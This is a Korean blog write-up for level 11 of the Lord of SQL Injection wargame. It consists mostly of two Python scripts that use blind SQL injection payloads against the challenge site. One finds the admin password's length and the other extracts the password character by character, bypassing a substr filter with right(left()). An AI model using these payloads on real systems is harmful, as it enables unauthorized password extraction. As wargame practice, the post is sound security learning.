Oh! JUN
[Lord Of SQL Injection] 11번 본문
패스워드 길이 알아내기
import requests
import string
url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php"
cookie = dict(PHPSESSID="쿠키값")
for i in range(1,100):
param = "?pw='|| length(pw)like'"+str(i)+"'%23"
len_result = url+param
response = requests.get(len_result, cookies=cookie)
if response.text.find("Hello admin")>0:
print("password :"+str(i))
break
패스워드 알아내기
import requests
import string
url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php"
cookie = dict(PHPSESSID="쿠키값")
asc = string.digits+string.ascii_letters
result=""
for i in range(1,9):
for j in asc:
param = "?pw=%27||ascii(right(left(pw,"+str(i)+"),1))like%27"+str(ord(j))+"%27%23"
print(param)
res_url = url+param
response = requests.get(res_url, cookies=cookie)
if response.text.find("Hello admin")>0:
print("suscess")
print(j)
result+=j
break
print("pw :"+result)
substr 필터링 되니까 right(left(pw,1),1)로 우회해서 알아냈다.
'문제풀이 > Lord of SQL Injection' 카테고리의 다른 글
[Lord Of SQL Injection] 14번 (0) | 2022.02.03 |
---|---|
[Lord Of SQL Injection] 13번 (0) | 2022.02.03 |
[Lord Of SQL Injection] 12번(자세한 설명,수정완료) (0) | 2022.02.02 |
[Lord Of SQL Injection] 7번 (0) | 2022.01.30 |
[Lord Of SQL Injection] 4번 (0) | 2022.01.30 |